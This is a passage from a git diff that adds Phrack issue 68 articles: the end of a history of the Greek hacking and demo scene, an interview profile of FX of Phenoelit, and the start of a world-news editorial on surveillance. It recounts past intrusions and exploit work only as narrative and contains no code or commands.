+from referring to particular nicknames/handles. We will, instead, give a
+macroscopic view of our scene's past glory. Btw, you may notice a focus on
+cities other than Athens. That's a byproduct of the fact that most of the
+people that provided information are not from Athens.
+
+
+----[ Dawn of time
+
+At the dawn of time there were BBSes. And FidoNet.
+
+The very first BBS in Greece, named .ARGOS system, started operating in
+late 1984. It was a non-networked BBS, mostly built around a message
+bulletin board. It was arguably the first online community in Greece.
+Another early BBS was AcroBase established in 1988 [ACR]. The next major
+event was in 1989 when the first FidoNet nodes in the city of Thessaloniki
+became active. They connected the Greek BBS community to the world by
+FidoNet mail and several local and global echomail (usenet news-like)
+areas. In 1992 Compupress [CPS], a very creative and innovative (for
+Greek standards ;) publishing company, very famous among Greek computer
+users, launched its BBS, codenamed "Compulink". 1994 most people agree that
+it was the "Golden Era" of Greek BBSing. There were around 100 FidoNet
+nodes in most urban and rural areas of Greece. The "Twilight Zone" BBS was
+offering public access to a selected choice of usenet groups and public
+access to Internet email through a UUCP-to-FidoNet gateway. Several
+regional and some international FidoNet-technology networks other than
+FidoNET connected most of the amateur computer community in Greece at that
+time. In Thessaloniki there were weekly FidoNet meetings every Friday,
+forming the first stable, most widespread and long-lived (till today!)
+Greek amateur computer society. There were meetings hosting over 30 to 40
+people, in times when Computing and Information Technology were terms
+almost unheard of in Greece. In 1996, the FidoNet nodelist count drops to
+51. This was mainly due to the increasing number of ISPs and dialup users,
+and it was the start of demise for the BBS/FidoNet era of Greece.
+
+Around that time, Compupress' Compulink BBS evolved into a full blown,
+but tiny, ISP that provided dialup access to the Internetz while at the
+same time maintaining its BBS service. In 1995-97 the Greek underground
+was heavily involved in hacking Compulink and its BBS services; there
+were a lot of incidents and even formal complaints. The fights between
+Compulink's administrators and well-known members of the underground are
+almost legendary. This era saw the founding of several hacker (with and
+without quotes) groups, and is considered by many as the birthplace of
+the Greek scene.
+
+At this point we should mention that Compupress was the publisher of Pixel,
+a very famous and influential magazine for personal computers. Pixel first
+appeared in 1983 and usually included type-in programs as code listings! In
+1987, Pixel published the details for one of the oldest virii written by a
+Greek guy [PIX]. The virus was randomly displaying the message "Program
+sick error. Call doctor or buy Pixel for cure description". Leet or what?
+
+In the following years, more companies entered the Internet market and
+Internet access started to spread. Early ISPs were just charging a yearly
+fee for dial-up access, and each phone call to them costed a small one-time
+amount (~20 drachmas). These led to a lot of people downloading warez off
+Usenet, idling on the Greek IRC network (GRNET) and wardialing. The suits
+of the ISPs and the phone company (OTE) saw that as a cash cow to milk,
+reacted quickly and established time-based charging (security counter
+measures? :p). That's the point it started to become expensive for
+end-users to access the Internet.
+
+This period saw the emergence of a lot of "hacker" groups. This time the
+quotes are necessary, however there were noteworthy exceptions. Most of
+these groups focused on attacking the ISPs of the time. In one specific
+incident, the ISP Hellas On-Line (HOL) was hacked and its main password
+file was stolen and exchanged in the underground. In order to cover the
+breach and cause confusion, HOL is rumored to have started distributing a
+fake password file among the underground. What needs to be highlighted is
+that this was one of the first 'dirty or at least "less than sincere"
+incident response tactics' used by companies as they started to become
+targets to attacks.
+
+At this time most of the serious hackers were mainly individuals, sometimes
+organized in anarchy groups that used to have fun breaking things, both
+metaphorically and literally :) Some day in 1995, #grhack (!= grhack.net)
+gets established in undernet. #grhack was an IRC room where several skilled
+people used to hang out and exchange information. #grhack is still so
+respected among the Greek hackers that several lame Greek cockroaches try
+to convince one another that they were supposedly active back in the day
+(fuck off, you know who you are). It was in #grhack that the term "GHS"
+(Greek Hackers Society - "S" for "Society" and *not* "Scene") first
+appeared. GHS was exactly what the initials described, a community that
+consisted of people with respectable and notable skill set and state of
+mind, people that actually *hacked* (as opposed to the ones whose knowledge
+is limited to merely running sqlmap and other canned tools).
+
+Additionally, members of #grhack were also the creators of hack.gr and
+grhack.gr [GGR], two old school sites representing the state of the
+scene at the time. It's interesting to note that the hack.gr user pages
+are still up and running at [HGR] (most people listed there are/were
+respectable, however some idiots also managed to get there). Also,
+grhack.gr is still maintained by one of the guys (greets and respect)!
+
+Of particular mention was a group of hackers situated mainly (but not
+strictly) at the city of Patras and associated with hack.gr. They had
+advanced skills, anarchist ideologies, and weird links with mind-expanding
+experiences (LSD? Who knows... ;). It is clear that their mentality had a
+lot to do with their deep education and love of reading (outside technology
+as well). A couple of them even transcended the borders of Greece and
+became members of the famous hacking group ADM. Their work was and still is
+inspirational to a lot of us. It is also worth noting that apart from ADM,
+members of the Greek underground have participated in or have been founders
+of other famous hacking groups or communities such as w00w00,
+ElectronicSouls, el8, 9x, POTS and probably others.
+
+1996-1999 was a high time for the Greek computer underground related
+press (the traditional mainstream computer press was dominated by the
+RAM magazine). Several publications surfaced, "Laspi", "The Hack.gr
+Gazette" and many more. Their focus was primarily on the freedom of
+speech/information. Some of them were humorous, while others used caustic
+words to describe, according to the authors, unethical acts of people
+who got famous by abusing the term "hacking". For example, "Ypokosmos tou
+Internet" [IUW] (Internet Underworld) was one of the most famous zines,
+kinda like el8, ZF0 etc ;). Internet Underworld focused on exposing
+the security and privacy related blunders of ISPs and other poorly
+maintained organizations/companies without however publishing private
+data online. It was created in response to the "Kosmos tou Internet"
+(Internet World), a traditional press magazine. The Internet Underworld
+zine was shut down by OTE officials who threatened(?) VRnet (their hosting
+provider) with disconnection. The interested reader can find more details
+at [ISE] and [TEL], two articles that give more information on the
+publications of the time (unfortunately they are in Greek but Google
+Translate is your friend).
+
+In 2001 the first Greek "con" took place in Athens. It was called "HOUMF!
+Con version 0.0" (Hacking Organisation of Unix Mother Fuckers [HMN]) and it
+brought together people from the Greek underground with interests in
+security and hacking [HMF]. Since it was only a "demo" (hence the 0.0
+version number :) of a full conference, there were only three talks given
+[HMT]. However it was considered a huge success since there were about
+150 participants, an impressive number if you consider the size of the
+Greece scene at that (and this really) time. By the end of December 2000,
+more than 100 people had expressed their interest to attend it!
+
+HOUMF v1.0 was scheduled for the April of 2002. Due to the media
+going berserk on a new disease spread at the time, the organizers were
+unable to find a room to host the meeting. Preparations ended abnormally,
+disappointing a lot of people who would love to attend. It was then when
+most Greeks did what they knew best; Troll and flame the organizers for
+no obvious reason. The truth is that there hasn't been any attempt for
+another underground con in Greece since then. Crappy remarks from worthless
+people aside, the truth is, if anyone was better at organizing an
+underground con of this magnitude, they'd just be doing it already.
+
+Around 2000-2001 two more groups appeared in the scene, USF (United
+Security Force) and UHAGr (United Hackers' Association of Greece). Both
+were quite active in efnet and undernet, so, several people may recall
+their names as well as both good and bad memories along with them. It's
+quite notable that there was an interesting hatred among the members
+of the two teams, maybe mostly because of personal differences, but
+looking back in time one can only see the fun part of it. USF and UHAGr
+both had their own websites; www.infected.gr [INF] and www.uhagr.org
+[UHA] respectively, where one could see a bunch of releases (papers,
+codes etc.) as well as funny material, pics from meetings and so on. As
+far as we know, members of the two teams used to meet in real life in
+Thessaloniki and Athens in order to have fun and break things.
+
+In 2003-2004, r00thell came into existence. r00thell wasn't a team in the
+strict sense, it was an active think-tank of 5-6 people mostly interested
+in exchanging techniques and ideas. One of the most funny things about
+r00thell was their members' interest to explore exotic architectures
+which eventually led to a development of a whole heterogeneous network
+that these guys had access to (AIX, SunOS, HP-UX, etc.). If r00thell had a
+leader that would be the webmaster of kizoku.r00thell.org, a security
+portal were one could find interesting texts and several resources. A very
+interesting 'about' page can be found at [R00], titles of some texts at
+[R0T] and some projects they used to work on at [ROP].
+
+The same (more or less) people that spawned r00thell, were the
+creators of other communities as well. Ono-sentai [ONO] was such an
+example. Ono-sentai was born some time around 2001-2002 and it seems
+like the members had really fun times. It's unfortunate that the site
+is written in greeklish; we wish everyone was able to read the sections
+'about' and 'kotsanes'! Nevertheless, the website features technical
+content that may be in value even nowadays (wardialing results, local root
+exploits, papers and other resources which are worth studying). Apart from
+the technical content, ono-sentai became very famous for the detailed
+treatise on the non-existence of Santa-Clause (!) which you can find at
+[ONS]. We'd love to see an English version of this text; maybe we will
+some day convince the guy who wrote it to do a proper translation :p
+For now, you can try Google Translate on it :p
+
+It has always been believed that many members of the Greek underground
+struggle to mimic the behavior of certain USA groups/communities. We
+believe this is not an issue specific to our local scene and it's not
+bad either, at least not by default ;). In the past, several people have
+tried to follow the principles of pr0j3ct m4yh3m but most of them have
+failed miserably. Back in 2001, a zine called 'keyhole' started to
+circulate in the underground. 'Keyhole' was a zine like el8, h0no etc but
+only made it to the first issue ;) The zine's authors, calling themselves
+'OSS' (Open Secret Society), pretended to be anonymous hackers that exposed
+people for fun; A few days later, their identities became known. Most
+people agreed that 'keyhole' was a bad move; as far as we know, no one
+of the guys being flamed in the zine had hurt the authors.
+
+'Keyhole' was immediately considered an unjustifiable show-off that
+displeased several members of the Greek underground. It later became
+obvious that a group of people, named 'CUT' (Ch0wn Unix Terrorists)
+[CUT], were displeased the most; after managing to identify the 'keyhole'
+authors, CUT broke into their servers, sniffed mails, IRC logs and other
+funny material and eventually published a zine called 'asshole' which
+was considered a reply to 'keyhole' (hence the name). An interesting
+manifesto [CMN] was also sent to a famous Greek security portal. Although
+we believe that publishing sensitive private information is unethical,
+'asshole' showed the 'keyhole' authors what it feels like to have your ass
+exposed. In the manifesto, the authors of 'asshole' reacted to all that
+'whitehat vs. blackhat' bullshit that had started to affect the Greek
+communities.
+
+Since that time, more zines have emerged in our local communities
+usually targeting individuals. Our advice: If you don't like someone,
+just ignore them :)
+
+To our knowledge, the first arrest in Greece related to computer crime law
+took place in the September of 2000. It was a surprising and unprecedented
+move made by the Greek authorities, since prior to this incident there had
+been only warnings(?) so to say from law enforcement just to scare people
+off. The CCU (Computer Crime Unit) managed to locate and arrest a student
+of the Engineering School of Xanthi, who was later charged for causing
+damage to a very famous Greek ISP. Before this very first arrest, most
+people in the local hacking communities ignored the presence of
+intelligence agencies, but this unfortunate event signaled a new era of the
+Greek underground; an era characterized by an inherent suspicion in members
+of the underground that even their closest friends could be members of
+intelligence agencies. Unfortunately, this is a delicate issue which we
+wouldn't like to discuss further. Many people seem to be involved and we
+wouldn't like to hurt anyone.
+
+Last but not least, here's a list of other communities that were (or
+maybe still are) active within the Greek underground:
+
+1. System Halted
+
+2. Ethnic/nationalistic groups (which shall remain unnamed).
+
+
+----[ Demoscene
+
+The demoscene has always been an integral part of the computer underground.
+A lot of people believe it may be its pure heart nowadays that so many
+things in rest of the underground scene seem to be corrupted and rotten.
+
+This part of the phile concerns the past of the PC demoscene in Greece.
+That is not to say that the greek demoscene has been PC-only. Sceners from
+such platforms as the Amiga, Atari, CPC, C64 and Spectrum have been part of
+its mosaik. We, however, are going to focus on the PC-specific demoscene.
+
+In the introduction we stressed the fact that we wouldn't like to refer
+to particular nicknames of the Greek scene. Nevertheless, the demosceners
+had no problem having their nicknames revealed, so, we thought it would
+be nice to give credit where credit is due ;)
+
+As in most cases, one would expect the PC demoscene to have originated
+from big cities like Athens or Thessaloniki (where over 50% of the
+country's population is located), but surprisingly that was not the case.
+The story goes back to 1992 in the town of Katerini, where a group called
+ASD (Andromeda Software Development) was formed, and started uploading
+small productions to COSMOS BBS, a local Bulletin Board System. The group
+in the beginning consisted of Navis and Incus, creating PC utilities, but
+later Amoivikos joined them, and as a team decided to turn into graphics
+programming. Although Navis had previously coded various effects in C64 and
+PC, Cdemo5 should be considered the group's first demo.
+
+Meanwhile, three university students in Athens (Laertis, Jorge and
+Zeleps), decided to put a group together called Nemesis, but only released
+one single production in 1994 called spdemo which was an advertisement
+for a local BBS called Spectrum. It was quite a big thing when Megaverse
+BBS came online in the city of Patras around 1993. It functioned as a
+local demo repository, copying demos directly from Future Crew's own
+Starport BBS in Helsinki and distributing them locally. Dgt, the owner
+of Megaverse, along with emc, fm, gotcha and nEC, most of them users of a
+local BBS called Optibase, formed a group called dEUS which was destined
+to play a big part in the Greek PC demoscene. moT, the group's musician,
+was finally added to the group, which led to the release of their first
+production called Anodyne on the 5th of July 1994. dEUS was the first
+group in Greece to incorporate some kind of design in their demos and
+the first to submit a production, a 64k intro, to the Assembly Demoparty
+in Finland, although they never got past the preselection round. More
+importantly though, they were the first group to organize a demoparty in
+Greece. This initiative would eventually result to Patras becoming in a
+way a "capital" for the greek demoscene. The first demoparty that dEUS
+organized took place on April 28, 1995 in an abandoned bank branch in
+the center of Patras and was a big success, gathering sceners from all
+around the country. ASD won the first place in the demo competition with
+their demo "Counterfactual", marking the beginning of their long winning
+career. The same year saw the formation of another group. Demaniacs were
+found in February of 1995 in Xanthi, by Cpc and NeeK, two students at
+the Democritus University of Thrace, who after watching Second Reality,
+decided to make something alike on their own, leading to an intro called
+"pandemonium". Later that year Theo joined them as a musician, leading
+finally to their first production with sound in March 1996. Gardening 96
+took place the following year, this time at the University of Patras'
+theater, which became the standard location for the parties that
+followed. The third and last Gardening event took place in 1997 at the
+same location. At that time, many other groups existed, notably Helix,
+Debris, Arcadia and Red Power. Little did anyone at that time know it
+would be the last of The Gardening demoparties. And suddenly, that was
+it. No demos came out for the following four years, no parties took place,
+and the scene seemed quite dead. When in the the year 2000 a LAN party,
+organized by many sceners took place in Athens, it was the closest it
+could get to a sceners' meeting. However, no productions came out of it.
+
+It was the following year that something significant happened. A
+demo-dedicated channel was created in GrNet, a greek IRC network, and
+gathered many of the previously scattered greek sceners as well as new
+ones. This led to an actual demoparty taking place. Digital Nexus 2001,
+which took place in Athens, and was organized by cybernoid, apomakros,
+doomguard and Abishai. ASD won the demo compo once more, presenting
+"Cadence and Cascade", the first Greek GPU-accelerated demo, which
+signaled a new era for the Greek demoscene. It is not well known though,
+that at the same party, Psyche, Raoul and zafos, three students from the
+university of Patras, resolved to revive the Gardening demoparties that
+had taken place at their University a while ago, and to form a demo group,
+later called nlogn. The fruit of their cooperation was a new demoparty
+called ReAct, which tried to revive the Gardening atmosphere, and took
+place on the 19th of April 2002. ASD with aMUSiC, their first musician
+since the group's formation, won the demo compo with their demo "Edge of
+Forever". The Greek demoscene seemed to be entering a new era indeed. A
+few new groups appeared, such as Quadra, The Lab, Psyxes, Nasty Bugs,
+nlogn and Sense Amok and things for a while looked promising. However,
+most (if not all) of the newly formed groups never released more than a
+couple of productions, and never managed to reach the level of productions
+that were made outside of Greece. Older groups, apart from ASD, never
+managed to release any new productions. Most of them disbanded but kept
+coming to parties. ReAct took place in 2002, 2003 and 2004, and then a
+demoparty called Pixelshow, organized by gaghiel, continued this long
+running tradition of having a party in the University's theater. Pixelshow
+took place twice, in 2005 and 2007 (the 2006 event was cancelled), and was
+the last demoparty to have taken place in Greece so far.
+
+Some things should be added concerning ASD at this point, since their fame
+is way beyond the Greek demoscene. Although almost no Greek group ever
+achieved fame outside Greece, ASD is one of the most famous demogroups
+worldwide. They currently hold the record of scoring four times 1st place
+in the combined demo compo of the Assembly demoparty, as well as having
+received eleven scene awards (demoscene's most prestigious award) so far.
+Their productions are marked by painstaking attention to detail, extremely
+well crafted transitions that have become their trademark, as well as a
+progressive metal soundtrack most of the times, composed by aMUSiC and
+Leviathan, the group's musicians.
+
+
+----[ What's past is prologue
+
+Relax, take a deep breath and try to think what do you want your place to
+be in the great scope of things. The (Greek) scene will go on with or
+without you, with or without any one of us. The scene is a collective.
+Respect it and it will respect you back. Give to it and you will receive.
+Understand the true spirit of hacking and stop being a Chrysaora Sqlmapis
+[SUB].
+
+In order to write this article, we contacted several people to ask for
+information. A lot of people helped not only with information, but also
+with anecdotes and even actual text. They have our respect and we thank
+them. Of particular mention are zafos/nlogn and amv/ASD. Also, we respect
+the fact that some people didn't want to share or have their stories
+made public, but nonetheless provided helpful feedback. Thank you guys
+too.
+
+
+----[ References
+
+[GRS] http://phrack.org/issues.html?issue=67&id=16
+[ACR] http://www.acrobase.org/
+[CPS] http://en.wikipedia.org/wiki/Compupress
+[PIX] http://www.f-secure.com/v-descs/pixel.shtml
+[GGR] http://www.grhack.gr/ and http://www.grhack.gr/first_page/
+[HGR] http://users.hack.gr/
+[IUW] http://web.archive.org/web/19990428222240/http://iuworld.vrnet.gr/
+[ISE] http://www.isee.gr/issues/01/special/
+[TEL] http://www.e-telescope.gr/el/internet-and-computers/
+      47-online-journalism
+[HMF] http://web.archive.org/web/20011020020500/houmf.org/v0.0/
+[HMN] http://web.archive.org/web/20020208000350/
+      http://ono-sentai.jp/readkotsanes.php?id=11
+[HMT] http://web.archive.org/web/20011212094327/http://houmf.org/v0.0/
+      papers.go
+[INF] http://web.archive.org/web/20011202184457/http://www.infected.gr/
+[UHA] http://web.archive.org/web/20030806115340/http://www.uhagr.org/
+[R00] http://web.archive.org/web/20050220152149/
+      http://www.r00thell.org/about/
+[R0T] http://web.archive.org/web/20050220232518/
+      http://www.r00thell.org/papers/
+[ROP] http://web.archive.org/web/20031007021404/
+      http://r00thell.org/projects.php
+[ONO] http://web.archive.org/web/20020330152233/http://ono-sentai.jp/
+[ONS] http://web.archive.org/web/20020305052051/
+      http://ono-sentai.jp/readkotsanes.php?id=3
+[SUB] http://tinyurl.com/882vez7
+[CMN] http://web.archive.org/web/20050218172857/
+      http://www.ad2u.gr/mirrors/CUT.txt
+
+      http://web.archive.org/web/20050219114701/
+      http://www.ad2u.gr/mirrors/toxicity.email
+[CUT] http://web.archive.org/web/20050206231527/
+      http://www.ad2u.gr/article.php?story=20030105175233835
+
+
+----[ EOF
diff --git a/phrack68/2.txt b/phrack68/2.txt
new file mode 100644
index 0000000..0246706
--- /dev/null
+++ b/phrack68/2.txt
@@ -0,0 +1,358 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x02 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ PHRACK PROPHILE ON ]=-----------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[  FX of Phenoelit   ]=-----------------------=|
+|=-----------------------------------------------------------------------=|
+
+|=---=[ Specifications
+
+           Handle: FX
+              AKA: 41414141
+    Handle origin: First and last letter of my first name
+                   (I had no idea it had a meaning in movie production)
+      Produced in: East Germany
+             Urlz: http://www.phenoelit.de/
+        Computers: Metric tons of them
+       Creator of: much crappy and useless code
+        Member of: Phenoelit, Toolcrypt
+         Projects: PH-Neutral, Phonoelit
+            Codez: IRPAS (bunch of tools that somehow still cause havoc)
+                   cd00r.c (later called PortKnocking by the copycats)
+                   works-on-my-machine exploits
+     Active since: late 80s
+   Inactive since: unlikely to happen
+
+|=---=[ Favorites
+
+          Actors: don't care
+           Films: Hackers (1995) - imagine it actually would be like that
+         Authors: Neal Stephenson, Iain M. Banks, Frank & Brian Herbert
+        Meetings: Bars
+             Sex: ACK
+           Books: Computer Security, Time-Life Books (1986), and it began
+           Novel: too many to list
+           Music: Progressive House Kitsch
+         Alcohol: Oh Yes!
+            Cars: Mercedes-Benz
+           Girls: SYN
+           Foods: German
+          I like: honesty, pragmatism, realism, tolerance, style, empathy
+       I dislike: fakes, aggression, ignorance, senselessness, deception
+
+|=---=[ Describe your life in 3 sentences
+
+Every work day is packed with challenges, great hacks and awesome people.
+Every free day compensates with non-security hobbies and sleep.
+This sentence is padding.
+
+|=---=[ First contact with computers
+
+At the age of 6 at the computing department of the university of Sofia,
+Bulgaria. Didn't leave much of an impression, as I was only allowed to play
+a silly game (in CGA color).
+
+Second contact happened at the age of 9 or 10, a Robotron Z9001. It came
+without software but with a typewriter made programming manual for BASIC.
+I read it cover to cover.
+
+|=---=[ Passions: What makes you tick
+
+Like-minded people: Conversations give me the greatest boost. Let me 
+explain something to a person who gets it, and I will have a new idea how
+to take it further.
+
+Also, work. That state of a problem where it is no longer fun, but actual
+work, to get it where you want it. Not letting go. Stubbornness compensates
+for a lot of talent.
+
+|=---=[ Unix or Windows? Juniper or Cisco?
+
+Unix and Windows. I like both, I use both, they both suck in their own
+ways. The only thing you will not see me with is anything Apple.
+
+Juniper, Cisco, all networking equipment is broken, Cisco being in the
+lead. How can you sell equipment that is in most cases simply forwarding
+IPv4 packets from interface 1 to interface 2 since 1987 and still crash on
+parsing IPv4 in 2011?
+
+|=---=[ Color of hat?
+
+undef($hat);
+
+|=---=[ Entrance in the underground
+
+First contact must have been around 1990. Shortly after the Berlin wall
+came down, I got my first 80286 machine and hung out at a computer club in
+a Thaelmann Pionieers' (youth organization of schoolchildren in East
+Germany) youth center. In a back room, two older guys downloaded infrared
+images from Russian satellites. While the download ran, they cracked PC
+games for the kids to pass the time. First time I saw a hex dump.
+
+I had the great honor to meet many people that I consider(ed) part of the
+real underground. Some of them still are. But I don't think I was ever part
+of that myself.
+
+|=---=[ Which research have you done or which one gave you the most fun?
+
+Anything I did was fun at the time, why doing it otherwise? I generally
+like fiddling around with Bits and bytes more than hunting bugs in large
+environments. Writing disassemblers, debuggers and the like is a pleasure.
+It's also monkey work. But it lets you feel so much about the history and
+design of a platform.
+
+I also like network protocols, because you can often see the vulnerability
+potential by reading the specifications already. Protocols are interfaces
+and interfaces are where the bugs live. Also, logging functions love to use
+packet contents and fixed buffers.
+
+|=---=[ Personal general opinion about the underground
+
+Much. Fucking. Respect.
+
+Seriously, what is published is only the tip of an iceberg. Once you talk
+to people, it's simply insane how much knowledge there is. Interestingly,
+I have the impression that little of this knowledge is ever used.
+
+One aspect often considered essential in the underground I dislike:
+Owning people fails to impress me. It's like beating people up, everyone
+can do that and none of it makes it an achievement. If you found that
+vulnerability yourself and made a custom exploit, that's an achievement.
+
+|=---=[ Personal general opinion about the German underground
+
+Regardless of the definition of underground, the hacking scene in Germany
+is very alive and diverse. However, I would love to see more of them
+write exploits.
+
+|=---=[ Personal general opinion about the European underground
+
+The U.S. is much more visible, but Old Europe kicks their ass any time.
+Just looking at the French scene is scary. If only they would speak
+English ;) And don't even get me started on east Europe and Russia.
+
+|=---=[ Memorable experiences/hacks
+
+- Finding my first overflow in Cisco IOS TFTP, resisting the urge to post
+  it immediately and deciding to write an exploit. Then realizing how much
+  of a journey lay ahead of me, since I had never written any exploit
+  before.
+
+- Writing an exploit that needed to be stable, i.e. work in the wild. After
+  weeks of frustration finally understanding that PoC is only 10% of
+  exploit development. Halvar saving my ass again with a simple hint.
+
+- Being asked by my employer to take the CISSP exam, being initially
+  rejected due to my "connections to hackers" as a DEFCON speaker, being
+  allowed to take the exam and finding a 12 octet MAC address in a
+  question. Finding out afterwards that (ISC)2 probably has more admin
+  users on their web servers than paying members.
+
+- Asking someone to look at Cisco IOS exploitation after I spent about
+  a decade with it and getting my ass kicked in less than a week. True
+  talent trumps everything.
+
+- Caesar's Challenge over the years: hearing about it, being invited in,
+  being told by Caesar that he accepts my solution, welcoming Caesar to
+  PH-Neutral.
+
+- Being invited to train a team of hackers and later finding out that
+  the whole purpose of the exercise was to cure them from their respect
+  for me. And it worked.
+
+- The nights in Wuxi (China) with the Wuxi Pwnage Team.
+
+|=---=[ Memorable people you have met
+
+- Halvar Flake
+  I have to thank this man for a lot of things in my life.
+
+- Sergey Bratus
+  A great man with a great vision. He changed how I look at academia and
+  hacking. With people like Sergey, there is hope.
+
+- John Lambert
+  One of the smartest men I've ever met. Just in case you wonder why
+  Windows exploitation is so challenging today.
+
+- Dan Kaminsky
+  Dan and I share a passion for protocols. We first met in 2002, about five
+  times, at cons all over the planet, and talked IP(v4). Good times.
+
+- ADM, that one summer
+
+|=---=| Memorable places you have been to
+
+- Idaho Falls
+
+|=---=[ Disappointing people you have met
+
+Many manufactured or self-styled experts giving presentations at
+conferences. If you didn't write or at least read the code in question,
+shut up. The number of charlatans is unfortunately growing steadily.
+Some would probably count me in that category as well.
+
+Also, friends that betray they very people that trust them most.
+
+|=---=[ Who came up with the name "Phenoelit" and what does it mean?
+
+Nothing to see here, move on.
+
+|=---=[ Who are you guys?
+
+Just friends.
+
+|=---=[ Who designed those awesome Phenoelit t-shirts?
+
+I always did the designs for Phenoelit and PH-Neutral. I greatly enjoy
+doing them. For PH-Neutral, the process was that I had to come up with a
+motive and would do all the work, Mumpi watching me, drinking beer and
+complaining. It would not have worked any other way.
+
+|=---=[ Phenoelit vs 7350 vs THC?
+
+We met 7350 and THC first time at the 17c3 and became friends with several
+of them over time. I sincerely miss 7350, but their time had come.
+
+|=---=[ Things you are proud of
+
+The team I am blessed to work with.
+
+|=---=[ Things you are not proud of
+
+- Writing shitty exploits
+- Having a pretty good hand at picking research topics that are not
+  relevant to the real world
+- Being strictly single-tasking
+
+|=---=[ Most impressive hackers
+
+- Dvorak
+- Halvar Flake
+- Philippe Biondi
+- Ilja van Sprundel
+- Anonpoet
+- Greg
+- Last Stage of Delirium
+
+This list is biased by me not knowing many of the really impressive
+hackers.
+
+|=---=[ Opinion about security conferences
+
+Security conferences have been essential for my personal development and I
+still love to go to them. I have a preference for smaller cons, since it is
+more likely to get to talk to people.
+Almost any talk has something for me to take away. But more important is
+the hallway track and going out with fellow hackers.
+
+The distinction between hacker cons and corporate or product security
+conferences used to be clear. It is no longer, which is sad.
+
+|=---=[ Opinion on Phrack Magazine
+
+IMHO one of the most well regarded e-zines in the world, influencing much
+research over the time of its existence. Just look at how many academic
+publications cite Phrack articles. Keep it up!
+
+|=---=[ What you would like to see published in Phrack?
+
+I think Phrack does just fine. For me, exploitation techniques are at
+the heart of Phrack. I also enjoy reading about environments that not
+many people have access to: control systems of all kinds, for example.
+
+Maybe you should aim for more timely releases though.
+
+|=---=[ Personal advices for the next generation
+
+That implies that I'm old and expired, right?
+
+The one advice I would give is: Don't care about the opinion of others when
+it comes to research. It doesn't matter if they think it's cool, you must
+think it's cool. Look for and credit prior art, build on what is there
+already and have fun doing so.
+
+And if you really have to use Python, understand that error handling is not
+the same thing as stack traces. Catch your exceptions and handle them, or
+at least display something useful.
+
+|=---=[ Your opinion about the future of the underground
+
+Predictions are hard, especially when they concern the future.
+
+|=---=[ Shoutouts to specific (group of) peoples
+
+To the hacker and vx groups of the 80s and 90s, who built the foundation
+of everything we still concern ourselves with today.
+
+|=---=[ Flames to specific (group of) peoples
+
+To the snake-oil security product vendors, who refuse to innovate and bind
+available talent in signature writing sweat jobs, because that model pays
+them so well. Your "protections" add vulnerabilities to every aspect of
+modern networks, and you know it. The halting problem is UNDECIDABLE!
+
+|=---=[ Quotes
+
+"Does it just look nice or is it correct?"
+- zynamics developer about a control flow graph
+
+"Nine out of the ten voices in my head say I'm not schizophrenic. The
+other one hums the melody of Tetris."
+
+|=---=[ Anything more you want to say
+
+I would like to thank the Phrack staff for this honor, although I'm still
+convinced there are 0x100 people who deserved it more.
+
+                  |=---=[ A eulogy for PH-Neutral ]=---=|
+
+We created PH-Neutral in 0x7d3 as an attempt to bring together the people
+we respected most. We were simply unaware of the other small events that
+already existed. The intention was to have an informal meeting with ad-hoc
+workshops and a great party. We failed at the party, despite a full-blown
+dance floor. However, the people actually worked together and discussed
+their projects and exploits. We were sending out the invitations
+individually by email and I was surprised about the many positive
+reactions. We would not have thought that so many well-known and
+interesting people would actually show up.
+
+Over the years, the event grew. Although we kept it invite-only, the
+mechanism for invitations had to consider people that were there in the
+past as well as fresh blood. Therefore, one way or another, it had a snow
+ball effect to it. But in the early years, this was a good thing. There
+was an astonishing amount of innovation going on during the first five
+years. We never expected to see people actually working together. It was
+the time of sharing code and knowledge, of searching for JTAG on a dance
+floor and of the Vista ASLR release.
+
+The bigger the event got, the more the focus shifted from hacking to party.
+Since that corresponded with our second initial goal, we did encourage it.
+We really like to party with our friends, and by party we mean actual
+dancing and not just standing around and getting drunk. It was amazing
+to see how well the party developed over the years. Despite the growth,
+it still had a very intimate feeling.
+
+Initially meant as a joke during setup of the second PH-Neutral, we had
+decided to not have it run forever. For one, we didn't want to see it going
+down and fading away. When more and more conferences started to show up on
+the map, it only encouraged us to conclude the story of PH-Neutral. It had
+its time and place.
+
+The last PH-Neutral 0x7db then proved that the decision was right. It was
+that little bit of too many people that turns a large group of
+international friends into a somewhat anonymous crowd. Although luckily
+not many guests noticed, it changed the way we had to run the event
+completely. Where in the years before, we could hack and party with our
+friends, we had to fire-fight, manage and regulate. That was not the way it
+was meant to be for us, so it was a good time to call it quits.
+
+PH-Neutral was made into what it was by the people that participated, more
+so than any other event I know. The people decided on the spin of each
+year's event by how they filled the frame we gave them. It was their
+party and they took it and made it great. Thank you forever!
+
+[ EOF ]
diff --git a/phrack68/3.txt b/phrack68/3.txt
new file mode 100644
index 0000000..3449232
--- /dev/null
+++ b/phrack68/3.txt
@@ -0,0 +1,129 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x03 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ Phrack World News ]=------------------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------------------=[ by TCLH ]=------------------------------=|
+|=-----------------------------------------------------------------------=|
+
+It is been a while since the last Phrack World News, and much has happened
+in our world since then. Governments have been overthrown [1], human rights
+partially restored in one country, and taken away in the next [2]. The
+so-called first world has been bought, delivers monitoring and suppression
+equipment to totalitarian countries [3] as well as making its use a legal
+requirement in their owni [4]. The content mafia, considering every form of
+creative and work output their property, has declared war on all internet
+citizen. No matter if picture, song, movie or academic paper, you shall pay
+for its consumption or be banned from the net [5]. That they are actually
+trying to resist evolution [6] is of no concern to them.
+
+In times like that, where your network traffic may go though more deep
+packet inspection engines than observable hops in traceroute, the hacker
+shall reconsider his ways of communication. It is no longer enough to
+SSH/VPN into one of your boxes and jump into your screen sessions, as the
+communication of that box is monitored as much as your home network
+connection.
+
+Global surveillance is no longer stuff from science fiction books, or
+attributed only to the most powerful secret services in the world. It
+becomes a requirement for most ISPs to stay in business. They can either
+sell you, or they can sell their company, and you can bet that the later is
+not an option they consider.
+
+Besides, traffic patterns of the average internet user change. We are
+approaching a time when the ordinary user will only emit HTTP traffic with
+his daily activities, making it easy for anyone interested to single out
+the more creative minds, just by the fact that they still use protocols
+like SSH, OpenVPN and IRC with their unmistakable signatures. It is up to
+us to come up with new and creative ways of using this internet before
+packets get dropped based on their protocol characteristics and we find
